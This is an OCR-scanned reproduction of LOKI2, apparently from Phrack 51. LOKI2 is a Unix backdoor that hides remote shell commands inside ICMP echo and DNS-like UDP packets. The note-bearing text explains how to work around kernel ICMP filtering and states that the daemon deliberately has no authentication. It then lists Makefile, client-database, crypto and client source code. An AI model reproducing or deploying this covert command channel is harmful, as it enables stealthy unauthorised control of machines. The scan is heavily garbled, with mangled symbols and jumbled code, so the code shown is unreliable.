Under Net/3, processes interested in receiving ICMP messages must register 
with the kernel in order to get these messages. The kernel will then pass 
all ICMP messages to these registered listeners, EXCEPT for damaged ICMP 
packets and request packets. Net/3 TCP/IP implementations will not pass ICMP 
request messages of any kind to any registered listeners. This is a problem 
if we are going to be using ICMP_ECHO (a request type packet) and want it to 
be directly passed to our user-level program (lokid). We can get around this 
restriction by inverting the flow of the transactions. We send ICMP_ECHOREPLYs 
and elicit ICMP_ECHOs. 


Note, that under Linux, we do not have this probem as ALL valid ICMP 
packets are delivered to user-level processes. If the daemon is installed on 
a Linux box, we can use the normal ICMP_ECHO -> ICMP_ECHOREPLY method of 


tunneling. Compile with -DNET3 according to this chart: 
Client 

Daemon | -------— Linux | *bsa* | Solaris | 
Linux no | yes | yes 
*bsd* no | yes | yes 
Solaris no | opt | opt 


The Initialization Vector 


When using Strong Crypto, the initialization vector (ivec) incrementation 
is event based. Every time a packet is sent by the client the client ivec is 
incremented, and, every time a packet is received by the server, the server 
Side ivec is also incremented. This is fine if both ends stay in sync with 
each other. However, we are dealing with a potentially lossy protocol. If 
a packet from the client to the server is dropped, the ivecs become desynched, 
and the client can no longer communicate with the server. 


There are two easy ways to deal with this. One would be to modify the ivec 
permutation routine to be time-vector based, having the ivecs increase as time 
goes by. This is problematic for several reasons. Initial synchronization 


would be difficult, especially on different machine architectures with 
different clock interrupt rates. Also, we would also have to pick a 
relatively small time interval for ivec permutations to be effective on fast 
networks, and the smaller the ivec time differential is, the more the protocol 
would suffer from clock drift (which is actually quite considerable). 


Protocol Swaping 


Swapping protocols is broken in everything but Linux. I think it has 
something to do with the Net/3 socket semantics. This is probably just a bug 
I need to iron out. Quite possibly something I did wrong. *shrug*... 


Nevermind the fact that the server isn’t doing any synchronous I/O multiplexing, 
consequently, swapping protocols requires a socket change on everone’s part. 
This is why this feature is ‘beta’. 


Authentication 
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Um, well, there is none. Any client can connect to the server, and any 


client can also cause the server to shut down. This is actually not a bug or 
a caveat. It is intentional. 
I/O 


Should be done via select. 


[ TODO LIST 


— possible time vector-based ivec permutation instead of event-based as event 
based is prone to synch failures, OR, even better, a reliability layer. 


[ The technologies 


[ SYMMETRIC BLOCK CIPHER 


A symmetric cipher is one that uses the same key for encryption and 
decryption, or the decryption key is easily derivable from the encryption key. 


Symmetric ciphers tend to be fast and well suited for bulk encryption, but 
suffer from woeful key distribution problems. A block cipher is simply one 
that encrypts data in blocks (usually 64-bits). The symmetric block cipher 


employed by LOKI2 is Blowfish in CFB mode with a 128-bit key. 


[ CFB MODE 


Symmetric block ciphers can be implemented as self-synchronizing stream 
ciphers. This is especially useful for data that is not suitable for padding 
or when data needs to processed in byte-sized chunks. In CFB mode, data is 
encrypted in units smaller then the block size. In our case, each encryption 
of the 64-bit block cipher encrypts 8-bits of plaintext. The initialization 
vector, which is used to seed the process, must be unique but not secret. We 
use every 3rd byte of the symmetric key for our IV. The IV must change for 
each message, to do this, we simply increment it as packets are generated. 


[ BLOWFISH 


Blowfish is a variable key length symmetric cipher designed by Bruce 
Schneier. It is a portable, free, fast, strong algorithm. 
It offers a key length of up to 448-bits, however, for LOKI2 we use 
a 128-bit key. 


[ ASYMMETRIC CIPHER 


An asymmetric cipher makes use of two keys, coventionally called the 
private key and public key. These two keys are mathematically related such 
that messages encrypted with one, can only be decrypted by the other. It 
is also infeasible to derive one key from the other. Asymmetric ciphers solve 
the problem of key management by negating the need for a shared secret, however 
they are much slower the symmetric ciphers. The perfect world in this case 
is a hybrid system, using both a symmetric cipher for key exchange and a 
symmetric cipher for encryption. This is the schem mployed in LOKI2. 


[ DIFFIE -— HELLMAN 


In 1976, Whitfield Diffie and Marty Hellman came forth with the first 
asymmetric cipher (DH). DH cannot be used for encryption, only for symmetric 
key exchange. The strength of DH relies on the apparent difficulty in 
computing discrete logarithms in a finite field. DH generates a shared secret 
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based off of 4 components: 


P the public prime 

g the public generator 

c{x, X} the client’s private/public keypair 

s{y, Y} the server’s private/public keypair 

Ss the shared secret (from the which the key is extracted) 


The protocol for secret generation is simple: 


[ NETWORK FLOW 


Ty. 'O: Ky Te 2 
Covert channel implementation for Unix 


daemon9|route [guild 1997] 


| LOKI2 CLIENT | 


a sendto () | FIRST GENERATION LOKI2 DAEMON | 
client sends | shadow () server forks 
data Vv 
Vv | 
| 
| 
v fork () 
C |P 
Vv | 
> clean_exit () parent exits 
2nd generation child daemon becomes leader of a new 
session, handles initial network requests 
Vv 
a oat ate > | SECOND GENERATION DAEMON | read () blocks until 
LOKI2 data arrives 
network “ 
traffic 
So cael es Head ind es <---e 
v fork () 
a C| |P 
| | parent continues 
| SSS RSS -Sce 
| 
| 3rd generation daemon handles client request 
Vv 
--<--—-— | THIRD GENERATION DAEMON | 


switch (PACKET_TYPE) 
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L_PK_REQ: L_REQ: 
STRONG_CRYPTO POPEN 
key management PTY | 
| pipe() < 
| | 
< < | 
| ee 
| | 
| v fork () 
Cn 
Unimplemented (7.97) C| |P 
| | os 
| ----> exit () 
| 
4th generation child | > > 
daemon execs commands Vv | 
| FOURTH GENERATION DAEMON | exec () 4g child execs 
command in 
STDOUT of command /bin/sh 


to client via pipe 


[ THANKS 


snocrash for being sno, 

nirva for advice and help and the use of his FreeBSD machine, 
mycroft for advice and the use of his Solaris machine, 
alhambra for being complacent, 

Craig Nottingham for letting me borrow some nomenclature, 
truss and strace for being indespensible tools of the trade, 


Extra Special Thanks to OPii <opii@dhp.com> for pioneering this concept and 
technique. 


[ THE SOURC 


GJ 


Whelp, here it is. Extract the code from the article using one of the 
included extraction utilities. 


<++> L2/Makefile 


Makefile for LOKI2 Sun Jul 27 21:29:28 PDT 1997 
route (c) 1997 Guild Corporation, Worldwide 
Het HE 
Choose a cryptography type 
CRYPTO_TYPE = WEAK_CRYPTO XOR 
CRYPTO_TYPE = NO_CRYPTO Plaintext 
CRYPTO_TYPE STRONG_CRYPTO Blowfish and DH 
Ht tH 
If you want STRONG_CRYPTO, uncomment the following (and make sure you have 
SSLeay) 
LIB_CRYPTO_PATH = /usr/local/ssl/lib/ 
CLIB = —-LS$ (LIB_CRYPTO_PATH) —-lcrypto 
MD5_OBJ = md5/md5c.o0 
Het HE 
Choose a child process handler type 
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SPAWN_TYPE POPEN 
SPAWN_TYPE PTY 
Ha tH 


It is safe to leave this alone. 


NET3 = #—-DNET3 

SEND_PAUSE a SEND_PAUSE=100 

DEBUG = #—-DDEBUG 

# # 

i_hear_a_voice_from_the_back_of_the_room: 
@echo 
@echo "LOKI2 Makefile" 
@echo "Edit the Makefile and then invoke with one of the following:" 
@echo 
@echo "linux openbsd freebsd solaris clean" 
@echo 
@echo "See Phrack Magazine issue 51 article 7 for verbose instructions" 
@echo 

linux: 
@make OS=-DLINUX CRYPTO_TYPE=—-DS$ (CRYPTO_TYPE) \ 
SPAWN_TYPE=—DS$ (SPAWN_TYPE) SEND_PAUSE=—DS (SEND_PAUSE) \ 
FAST_CHECK=-Dx86_FAST_CHECK IP_LEN= al] 

openbsd: 
@make OS=-DBSD4 CRYPTO_TYPE=—DS$ (CRYPTO_TYPE) \ 
SPAWN_TYPE=—DS$ (SPAWN_TYPE) SEND_PAUSE=—DS (SEND_PAUSE) \ 
FAST_CHECK=—-Dx86_FAST_CHECK IP_LEN= all 

freebsd: 
@make OS=-DBSD4 CRYPTO_TYPE=—DS$ (CRYPTO_TYPE) \ 
SPAWN_TYPE=-DS$ (SPAWN_TYPE) SEND_PAUSE=-—DS (SEND_PAUSE) \ 
FAST_CHECK=—Dx86_FAST_CHECK IP_LEN=—-DBROKEN_IP_LEN all 

solaris: 
@make OS=-DSOLARIS CRYPTO_TYPE=-—DS (CRYPTO_TYPE) \ 
SPAWN_TYPE=—DS$ (SPAWN_TYPE) SEND_PAUSE=—DS (SEND_PAUSE) \ 
LIBS+=-lsocket LIBS+=-lnsl IP_LEN= all 

CFLAGS Wall -06 -finline-functions -funroll-all-loops $(0OS) \ 

$(CRYPTO_TYPE) $(SPAWN_TYPE) $(SEND_PAUSE) $ (FAST_CHECK) \ 
S (EXTRAS) $(IP_LEN) $(DEBUG) S$ (NET3) 

CC = gcc 

C_OBJS = surplus.o crypt.o 

S_OBJS = client_db.o shm.o surplus.o crypt.o pty.o 

ore) 

S$(CC) S(CFLAGS) -c $< -o $@ 

all: S(MD5_OBJ) loki 


md5o0bj: md5/md5c.c 
@( cd md5; make ) 


_OBJS) loki.o $(S_OBJS) lokid.o 

C) S(CFLAGS) $(C_OBJS) $(MD5_OBJ) loki.c -o loki $(CLIB) $(LIBS) 
C) S(CFLAGS) $(S_OBJS) S$(MD5_OBJ) lokid.c -o lokid $(CLIB) $(LIBS) 
trip loki lokid) 
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@( rm -fr *.0o loki lokid ) 
@( cd md5; make clean ) 
clean 
@( cd .. ; tar cvf loki2.tar L2/ ; gzip loki2.tar ) 


<--> Makefile 
<++> L2/client_db.c 


/* 


* LOKI2 


[ 


client_db.c ] 


1996/7 Guild Corporation Worldwide [daemon9] 


ude "loki.h" 


exter 
exter 
exter 
exter 
exter 


ifde 
exter 
exter 
endi 
ifde 
exter 
endi 


PYPYDD)D DY) 


£ 
n 
n 
ae 
£ 
n 
£ 


include "shm.h" 
include "client_db.h" 


struct loki rdg; 

int verbose; 

int destroy_shm; 

struct client_list *client; 
u_short c_id; 


STRONG_CRYPTO 
short ivec_salt; 
u_char user_key[BF_KEYSIZE]; 


PTY 
int mfd; 


The server maintains an array of active client information. This 


function simply steps through the structure array and attempts to add 
* an entry. 


*/ 
int add_client (u_char *key) 

int i = 0, emptyslot = -1; 
ifdef PTY 

char p_name[BUFSIZE] = {0}; 
endif 

locks (); 

for (; i < MAX_CLIENT; itt) 


{ 


endi 


} 
i 


{ 


a 


£ 


if (IS_GOOD_CLIENT (rdg) ) 

{ /* Check for duplicate entries 
* (which are to b xpected when 
* not using STRONG_CRYPTO) 
xy 


ifdef STRONG_CRYPTO 


if (verbose) fprintf(stderr, S_MSG_DUP); 


emptyslot = i; 


break; 
} /* tag the first empty slot found */ 
if ((!(client[i].client_id))) emptyslot = i; 
(emptyslot == -1) 


/* No empty array slots */ 
if (verbose) fprintf(stderr, "\nlokid: Client database full"); 
ulocks(); 
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#endi 


int 


ifdef STRONG_CRYPTO 


return (NNOK) ; 
} 


/* Initialize array with client info 
client [emptyslot].touchtime = time((time_t *)NULL); 
if (emptyslot != i){ 
client [emptyslot].client_id = c_id; 
client [emptyslot].client_ip = rdg.iph.ip_src; 
client [emptyslot].packets_sent = 0; 
client [emptyslot] .bytes_sent = 0; 
client [emptyslot].hits = 0; 
ifde PTY 
client [emptyslot].pty_fd = 0; 
#endif 
} 
ifdef STRONG_CRYPTO 


/* copy unset bf key and set salt */ 
opy (key, client [emptyslot].key, BF_KEYSIZE) ; 
client [emptyslot].ivec_salt = 0; 


jon 
Q 


Fh Ft 


ulocks(); 
return (emptyslot); 


Look for a client entry in the client database. Either copy the clients 
key into user_key and update timestamp, or clear the array entry, 
depending on the disposition of the call. 


locate_client (int disposition) 


int i = 0; 


locks (); 
for (; i < MAX_CLIENT; i++) 
{ 


5 


if (IS_GOOD_CLIENT (rdg) ) 
{ 


if (disposition == FIND) /* update timestamp */ 
{ 


client [i].touchtime = time((time_t *)NULL); 


/* Grab the key */ 


bcopy(client[i].key, user_key, BF_KEYSIZE); 
endif 
} 
/* Remove entry */ 
else if (disposition == DESTROY) 
bzero(&client[i], sizeof(client[i])); 
ulocks(); 
return (i); 
} 
} 
ulocks(); /* Didn’t find the client */ 


return (NNOK); 


Fill a string with current stats about a particular client. 


stat_client (int entry, u_char *buf, int prot, time_t uptime) 


int n = 0; 
time_t now = 0; 


Ay 
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struct protoent *proto = 0; 
/* locate_client didn’t find an 
* entry 
xy 
if (entry == NNOK) 
{ 
fprintf(stderr, "DEBUG: stat_client nono\n"); 


return 


(NOK 


} 
n = sprintf (buf, 
n sprintf (&buf[n 


i 


"\nlokid version: \t\t%s\n", 
"remote interface:\t%s 


= getprotobynumber (prot); 


sprintf (&buf[n 


"active transport:\t%s 


VERSION) ; 
\n", host_lookup(rdg.iph.ip_dst) ); 


\n", proto -> p_name); 


n += sprintf(&buf[n], “active cryptography:\t%s\n", CRYPTO_TYPE) ; 

time (&now) ; 

n += sprintf(&buf[n], "server uptime:\t\t%.02f minutes\n", difftime(now, uptime) / 0x3c 
i 

locks (); 

n += sprintf(ébuf[n], "client ID:\t\t%d\n", client [entry].client_id); 

n += sprintf(ébuf[n], "packets written:\t%ld\n", client[entry].packets_sent) ; 

n += sprintf(ébuf[n], "bytes written:\t\t%ld\n", client[entry] .bytes_sent); 

n += sprintf (ébuf[n], "requests:\t\t%d\n", client [entry].hits); 


ulocks(); 


return (n); 


* and alarm timer. 
* / 
void client_expiry_check () { 


alarm(0); 
age_client(); 


if (signal (SIGALRM, 
err_exit(l, 1, verbose, 


alarm (KEY_TIMER) ; 


Unsets alarm timer, then calls age_client, then resets signal handler 


/* re-establish signal handler */ 


client_expiry_check) == SIG_ERR) 
"(fatal] 


cannot catch SIGALRM"); 


client list. 
in KEY_TIMER seconds. 


* 
a 
void age_client () 


{ 


time_t timestamp = 0; 
int i = 0; 


time (&timestamp) ; 
locks(); 

for (; i < MAX CLIENT; 
{ 


itt) 


if (client[i].client_id) 
{ 


if (difftime (timestamp, 
{ 


if (verbose) 


fprintf(stderr, 


This function is called every KEY_TIMER interval to sweep through the 

It zeros any entrys it finds that have not been accessed 
This gives us a way to free up entries from clients 
which may have crashed or lost their QUIT_C packet in transit. 


client [i].touchtime) > KEY_TIMER) 


"\nlokid: 


inactive client <%d> expired from li 
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st [%d]\n", client[i].client_id, i); 
bzero(&client[i], sizeof(client[i])); 


/* 


* 


*/ 


endif 


} 
} 


ulocks(); 


ifdef STRONG_CRYPTO 
ivec_salt = 


0; 


Update the statistics for 


void update_client (int entry, 


{ 


/* 


* 


yf 


u_long check_client_ip(int entry, 


{ 


} 


locks ( 
client 
client 
client 
cl 
ul 


7 
entry 
entry 
entry 
entry 
i 


lient 
locks 


) 
[ 
[ 
[ 
[ 
( 


] 
] 
] 
] 


.touchtime 
-packets_sent 
.-bytes_sent 
-hits 


int pcount, 


client. 


pcount; 


= bcount; 


u_long bcount) 


= time((time_t *)NULL); 


Returns the IP address and ID of the targeted entry 


u_long ip = 


locks(); 
if ((*id = 
ulocks(); 


return (ip); 


0; 


(client fentry].client_id) )) 


#ifdef STRONG_CRYPTO 


/* 


* 


a), 


Update and return the IV salt for the client 


u_short *id) 


ip 


client [entry].client_ip; 


u_short update_client_salt (int entry) 


{ 


} 


#endif 


/* 


u_short salt 


locks(); 
salt = ttc 
ulocks(); 


return (sal 


EOF */ 


im aes 


<--> client_db.c 
<++> L2/client_db.h 


/* 


* LOKI 


/* STRONG_CRYPTO */ 


lient [entry] .ivec_salt; 
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* client_db header file 


* 


* 1996/7 Guild Corporation Productions [daemon9] 


*/ 


* Client info list. 
* MAX CLIENT of these will be kept in a server-side array 


*/ 
struct client_list 
ifdef STRONG_CRYPTO 
u_char key[BF_KEYSIZE]; /* unset bf key 
u_short ivec_salt; /* the IV salter 
endif 
u_short client_id; /* client loki_id 
u_long client_ip; /* client IP address 
time_t touchtime; /* last time entry was hit 
u_long packets_sent; /* Packets sent to this client 
u_long bytes_sent; /* Bytes sent to this client 
u_int hits; /* Number of queries from client 
ifdef PTY 
int pty_fd; /* Master PTY file descriptor 
endif 
}; 
define IS_GOOD_CLIENT (ldg) \ 
\ 
(c_id == client [i].client_id &&  \ 
ldg.iph.ip_sre == client[i].client_ip) > \ 
(0) ? (1) : (0) \ 
void update_client (int, int, u_long); /* Update a client entry 
/* client info into supplied buffer 
int stat _client(int, u_char *, int, time_t); 
int add_client (u_char *); /* add a client entry 
int locate_client (int); /* find a client entry 
void age_client (void); /* age a client from the list 
u_short update_client_salt (int); /* update and return salt 
u_long check_client_ip(int, u_short *); /* return ip and id of target 
<--> client_db.h 
<++> L2/crypt.c 
/* 
* LOKI2 
* 
* [ crypt.c ] 
* 
* 1996/7 Guild Corporation Worldwide [daemon9] 
*/ 
include "loki.h" 
include "crypt.h" 
include "md5/global.h" 
include "md5/md5.h" 
ifdef STRONG_CRYPTO 
u_char user_key[BF_KEYSIZE]; /* unset blowfish key */ 
BF_KEY bf_key; /* set key */ 
volatile u_short ivec_salt = 0; 
/* 
* Blowfish in cipher-feedback mode. This implements blowfish (a symmetric 


* cipher) as a self-synchronizing stream cipher. The initialization 


#/ 
af 


a 
*/ 
a / 
xf 
*/ 
tcf: 


#f 
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vector (the initial dummy cipher-text block used to seed the encryption) 
need not be secret, but it must be unique for each encryption. I fill 
the ivec[] array with every 3rd key byte incremented linear-like via 

a global encryption counter (which must be synced in both client and 
server). 


pe ae ae a, OR 


/ 


void blur(int m, int bs, u_char *t) 


{ 


int i= 0, j = 0, num = 0; 

u_char ivec[IVEC_SIZE + 1] = {0}; 

for (; i < BF_KEYSIZE; i += 3) /* fill in IV */ 
ivec[j++] = (user_key[i] + (u_char) ivec_salt); 


BF_cfb64_encrypt(t, t, (long) (BUFSIZE - 1), &bf_key, ivec, &num, m); 


/* 
* Generate DH keypair. 
«ff 


DH* generate_dh_keypair () 


DH *dh = NULL; 
/* Initialize the DH structure */ 
dh = DH_new(); 


/* Convert the prime into BIGNUM */ 
(BIGNUM *) (dh -> p) = BN_bin2bn (modulus, sizeof (modulus), NULL); 
/* Create a new BIGNUM */ 


(BIGNUM *) (dh -> g) = BN_new(); 


/* Set the DH generator */ 
BN_set_word((BIGNUM *) (dh -> g), DH_GENERATOR_5)j; 

/* Generate the key pair */ 
if (!'DH_generate_key(dh)) return ((DH *)NULL); 


return (dh); 


/* 
* Extract blowfish key from the DH shared secret. A simple MD5 hash is 
perfect as it will return the 16-bytes we want, and obscure any possible 
* redundancies or key-bit leaks in the DH shared secret. 
*/ 


u_char *extract_bf_key(u_char *dh_shared_secret, int set_bf) 


{ 


u_char digest [MD5_HASHST1ZI 
unsigned len = BN2BIN_STIZI 
MD5_CTX context; 


/* initialize MD5 (loads magic context 
* constants) 
*/ 
MD5Init (&context) ; 
/* MD5 hashing */ 
MD5Update (&context, dh_shared_secret, len); 
/* clean up of MD5 */ 


MD5Final(digest, &context); 
bcopy (digest, user_key, BF_KEYSIZE); 


/* In the server we dunot set the key 
* right away; they are set when they 
* are nabbed from the client list. 


*/ 
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} 


if (set_b 
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£f == OR) 


BF_set_key (&bf_key, BF_KEYSIZE, user_key); 
return ((u_char *)NULL); 


} 


else return (strdup(user_key)); 


endif 

ifdef WEAK_CRYPTO 
/* 

* Simple XOR obfuscation. 

* 

“ ( Syko was right -- the following didn’t work under certain compilation 
* environments... Never write code in which the order of evaluation defines 
* the result. See K&R page 53, at the bottom... ) 

* 

* if (!m) while (i < bs) t[i] *= t[it+ +1]; 

* else 

a 4 

x i = bs; 

is while (i) t[i 1] *= t[i--]; 

eI 

* 

* 


void blur(int m, int bs, u_char *t) 


{ 


inti. = -0; 
if (!m) 
{ /* Encrypt */ 
while (i < bs) 
{ 
tli) “St fit) 
i+t; 
} 
} 
else 
{ /* Decrypt */ 
i = bs; 
while (i) 
{ 
t{i - 1] *= t[il; 
Bett 
} 
} 
} 
endif 


/* 


* 


ay, 


ifdef NO_CRYPTO 


No encryption 


void blur(int m, int bs, u_char *t) {} 


#endif 


/* 


EOF */ 


<--> crypt.c 
<++> L2/crypt.h 


/* 


* LOKI 


* 


* crypt header file 
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1996/7 Guild Corporation Productions [daemon9] 

* / 
#ifdef STRONG_CRYPTO 
/* 384-bit strong prime */ 
u_char modulus[] = 

{ 
OxDA, OxE1, 0x01, OxCD, OxD8, OxC9, Ox70, OxAF, OxC2, OxE4, OxF2, Ox7A, 
0x41, Ox8B, 0x43, 0x39, 0x52, Ox9B, Ox4B, Ox4D, OxE5, 0x85, OxF8, 0x49, 
0x03, OxA9, 0x66, Ox2C, OxCO, Ox8A, OxA6, 0x58, Ox3E, OxCB, 0x72, 0x14, 
OxA7, Ox75, OxDB, 0x42, OxFC, Ox3E, Ox4D, OxDF, OxB9, 0x24, OxC8, OxB3, 
}; 

#endif 
<--> crypt.h 
<t++> L2/loki.c 

/* 

* LOKI2 

* 

af he kis. Se | 

* 

* 1996/7 Guild Corporation Worldwide [daemon9] 

* / 

#include "loki.h" 

jmp_buf env; 

struct loki sdg, rdg; 

int verbose = OK, cflags = 0, ripsock = 0, tsock = 0; 
u_long p_read = 0; /* packets read */ 


ifdef STRONG_CRYPTO 

DH *dh_keypair NULL; 
extern u_short ivec_salt; 
endif 


int main(int argc, char *argv[]) 


/* DH public and private keypair */ 


static int prot = IPPROTO_ICMP, one = 1, c = 0; 
ifdef STRONG_CRYPTO 
static int established = 0, retran = 0; 
endif 
static u_short loki_id = 0; 
int timer = MIN_TIMEOUT; 
u_char buf [BUFSIZE] = {0}; 
struct protoent *pprot = 0; 
struct sockaddr_in sin; 
/* Ensure we have proper permissions */ 
if (getuid() || geteuid()) err_exit(1, 1, verbose, L_MSG_NOPRIV) ; 
loki_id = getpid(); /* Allows us to individualize each 


same protocol loki client session 


* on a given host. 


ay 

bzero((struct sockaddr_in *)&sin, sizeof(sin)); 
while ((c = getopt(argc, argv, "v:d:t:p:")) != EOF) 
{ 

switch (c) 

{ 

case 'v’: /* change verbosity */ 
verbose = atoi(optarg); 
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break; 
case ‘'d’: /* destination address of daemon */ 
strncpy (buf, optarg, BUFSIZE - 1); 
sin.sin_family = AF_INET; 
sin.sin_addr.s_addr = name_resolve (buf); 
break; 
case 't’: /* change alarm timer */ 


if ((timer = atoi(optarg)) < MIN_TIMEOUT) 
err_exit(1, 0, 1, "Invalid timeout.\n"); 
break; 


case 'p’: /* select transport protocol */ 
switch (optarg[0]) 
{ 


case /i’: /* ICMP_ECHO / ICMP_ECHOREPLY */ 
prot = IPPROTO_ICMP; 
break; 
case /u’: /* DNS query / reply */ 
prot = IPPROTO_UDP; 
break; 
default: 


err_exit(l1, 0, verbose, "Unknown transport.\n"); 


} 


break; 


default: 
err_exit(0, 0, 1, C_MSG_USAGE) ; 


/* we need a destination address */ 
(!sin.sin_addr.s_addr) err_exit(0, 0, verbose, C_MSG_USAGE) ; 
((tsock = socket (AF_INET, SOCK_RAW, prot)) < 0) 
err_exit(1, 1, 1, LL MSG_SOCKET) ; 


Fy Fh 


ifdef STRONG_CRYPTO /* ICMP only with strong crypto */ 
if (prot != IPPROTO_ICMP) err_exit(0, 0, verbose, L_MSG_ICMPONLY) ; 
endif 


/* Raw socket to build packets */ 
if ((ripsock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) 
err_exit(l, 1, verbose, L_MSG_SOCKET) ; 


ifdef DEBUG 
fprintf(stderr, "\nRaw IP socket: "); 
fd_status(ripsock, OK); 
endif 
ifdef IP_HDRINCL 
if (setsockopt (ripsock, IPPROTO_IP, IP_HDRINCL, &one, sizeof(one)) < 0) 
if (verbose) perror("Cannot set IP_HDRINCL socket option"); 
endif 
/* vegister packet dumping function 
* to be called upon exit 
*/ 
if (atexit (packets_read) == -1) err_exit(l, 1, verbose, L_MSG_ATEXIT); 
fprintf(stderr, L_MSG_BANNER) ; 
for (7 ;) 
{ 
#ifdef STRONG_CRYPTO 
/* Key negotiation phase. Before w 
* can do anything, we need to share 
* a secret with the server. This 
* is our key management phase. 
* After this is done, we are 
* established. We try MAX_RETRAN 
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* times to contact a server. 
“a 
if (!established) 
{ 
/* Generate the DH parameters and public 
* and private keypair 
aif 
if ('!dh_keypair) 
{ 


if (verbose) fprintf(stderr, "\nloki: % 
if (!(dh_keypair = generate_dh_keypair ( 
err_exit(l, 0, verbose, L_MSG_DHKGF 


", L_MSG_DHKEYGEN) ; 


Sor 
))) 
AIL); 
} 
if (verbose) fprintf(stderr, "\nloki: submiting our public key to server"); 
/* convert the BIGNUM public key 
* into a big endian byte string 
ard 
bzero((u_char *)buf, BUFSIZE); 
BN_bn2bin((BIGNUM *)dh_keypair -> pub_key, buf); 
/* Submit our key and request to 
* the server (in one packet) 
*/ 
if (verbose) fprintf(stderr, C_MSG_PKREQ) ; 
loki_xmit (buf, loki_id, prot, sin, L_PK_REQ); 


we 


} 


else 
{ 
#endif 
bzero((u_char *)buf, BUFSIZE); 
fprintf(stderr, PROMPT); /* prompt user for input */ 
read(STDIN_FILENO, buf, BUFSIZE - 1); 
buf[strlen(buf)] = 0; 
/* Nothing to parse */ 

if (buf[0] == ’\n’) continue; /* Escaped command */ 
if (buf[0] == '/’) if (('c_parse(buf, &timer))) continue; 


/* Send request to server */ 
loki_xmit (buf, loki_id, prot, sin, L_REQ); 
ifdef STRONG_CRYPTO 
} 


endif 


/* change transports */ 
if (cflags & NEWTRANS) 


{ 


close (tsock) ; 

prot = (prot == IPPROTO_UDP) ? IPPROTO_ICMP : IPPROTO_UDP; 

if ((tsock = socket (AF_INET, SOCK_RAW, prot)) < 0) 
err_exit(1, 1, verbose, L_MSG_SOCKET) ; 


pprot = getprotobynumber (prot); 


if (verbose) fprintf(stderr, "\nloki: Transport protocol changed to %s.\n", ppr 
ot -> p_name) ; 
cflags &= ~“NEWTRANS; 
continue; 
} 
if (cflags & TERMINATE) /* client should exit */ 


fprintf(stderr, "\nloki: clean exit\nroute [guild worldwide] \n"); 
clean_exit (0); 


} 
/* Clear TRAP and VALID PACKET flags */ 


cflags &= (“TRAP & “VALIDP); 
/* set alarm singal handler */ 
if (signal (SIGALRM, catch_timeout) == SIG_ERR) 
err_exit(l, 1, verbose, L_MSG_SIGALRM) ; 
/* returns true if we land here as the 
* result of a longjmp() -- IOW the 
* alarm timer went off 


if 
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fprintf(stderr, "\nAlarm.\n%s", C_MSG_ TIMEOUT) ; 


cflags |= TRAP; 
#ifdef STRONG_CRYPTO 
if ('established) /* No connection established yet */ 
if (++retran == MAX_RETRAN) err_exit(1, 0, verbose, "[fatal] cannot contact 
server. Giving up.\n"); 
else if (verbose) fprintf(stderr, "Resending...\n"); 
#fendif 
} 
while (!(cflags & TRAP) ) 
{ /* TRAP will not be set unless th 
* alarm timer expires or we get 
* an EOT packet 
*/ 
alarm(timer) ; /* block until alarm or read */ 
if ((c = read(tsock, (struct loki *)&rdg, LOKIP_SIZE)) < 0) 
perror("[non fatal] network read error"); 
switch (prot) 
{ /* Is this a valid Loki packet? */ 
case IPPROTO_ICMP: 
if ((IS_GOOD_ITYPE_C(rdg))) cflags |= VALIDP; 
break; 
case IPPROTO_UDP: 
if ((IS_GOOD_UTYPE_C(rdg))) cflags |= VALIDP; 
break; 
default: 
err_exit(l, 0, verbose, L_MSG_WIERDERR) ; 
} 
if (cflags & VALIDP) 
{ 
#ifdef DEBUG 
fprintf(stderr, "\n[DEBUG]\t\tloki: packet read %d bytes, type: ", c); 
PACKET_TYPE (rdg) ; 
DUMP_PACKET (rdg, c); 
#fendif 
/* we have a valid packet and can 
* turn off the alarm timer 
*/ 
alarm(0); 
switch (rdg.payload[0]) /* determine packet type */ 
{ 
case L_REPLY : /* standard reply packet */ 
bcopy (&rdg.payload[1], buf, BUFSIZE - 1); 
blur (DECR, BUFSIZE - 1, buf); 
ifndef DEBUG 
fprintf(stderr, "Ss", buf); 
endif 
p_readt+t+; 
break; 
case L_EOT : /* end of transmission packet */ 
cflags |= TRAP; 
p_readt+t; 
break; 
case L_ERR : /* error msg packet (not encrypted) */ 


bcopy (&rdg.payload[1], buf, BUFSIZE - 1); 


fprintf(stderr, " 
#ifdef STRONG _CRYPTO 


Ss" but); 


/* Tf the connection is not established 


* we exit upon receipt of an error 


*/ 
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if (!established) clean_exit (1); 


endif 
break; 


ifdef STRONG_CRYPTO 
case L_PK_REPLY : /* public-key receipt */ 
if (verbose) fprintf(stderr, C_MSG_PKREC) ; 
/* compute DH key parameters */ 
DH_compute_key (buf, (void *)BN_bin2bn(&rdg.payload[1], BN2BIN_SI1ZI 


GI 


NULL), dh_keypair); 
/* extract blowfish key from the 
* DH shared secret. 
* / 

if (verbose) fprintf(stderr, C_MSG_SKSET); 
extract_bf_key (buf, OK); 
established = OK; 
break; 


#endif 


case L_QUIT: /* termination directive packet */ 
fprintf(stderr, C_MSG_MUSTQUIT) ; 
clean_exit (0); 


default : 
fprintf(stderr, "\nUnknown LOKI packet type"); 
break; 
} 
cflags &= ~VALIDP; /* reset VALID PACKET flag */ 
} 
} 
} 
return (0); 
} 
/* 
* Build and transmit Loki packets (client version) 
Auf 


void loki_xmit (u_char *payload, u_short loki_id, int prot, struct sockaddr_in sin, int ptyp 
e) 


{ 


bzero((struct loki *)&sdg, LOKIP_SIZE) ; 
/* Encrypt and load payload, unless 
* we are doing key management 


*/ 


if (ptype != L_PK_REQ) 
{ 
ifdef STRONG_CRYPTO 
ivec_salttt; 


endif 


blur (ENCR, BUFSIZI 


ea) 
| 
hb 
s 


payload); 


} 
bcopy (payload, &sdg.payload[1], BUFSIZE - 1); 


5 


if (prot == IPPROTO_ICMP) 
{ 
ifdef NET3 /* Our workaround. */ 
sdg.ttype.icmph.icmp_type = ICMP_ECHOREPLY; 
else 
sdg.ttype.icmph.icmp_type = ICMP_ECHO; 
#endif 
sdg.ttype.icmph.icmp_code = (int) NULL; 
sdg.ttype.icmph.icmp_id = loki_id; /* Session ID */ 
sdg.ttype.icmph.icmp_seq = L_TAG; /* Loki ID */ 
sdg.payload[0] = ptype; 
sdg.ttype.icmph.icmp_cksum = 
( 


u_short *)&sdg.ttype.icmph, BUFSIZE + ICMPH_SIZI 


GJ 
~~ 
~ 


i_check ( 
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if (prot == IPPROTO_UDP) 
{ 
sdg.ttype.udph.uh_sport = loki_id; 
sdg.ttype.udph.uh_dport = NL_PORT; 
sdg.ttype.udph.uh_ulen = htons (UDPH_SIZE + BUFSIZE); 
sdg.payload[0] = ptype; 
sdg.ttype.udph.uh_sum = 
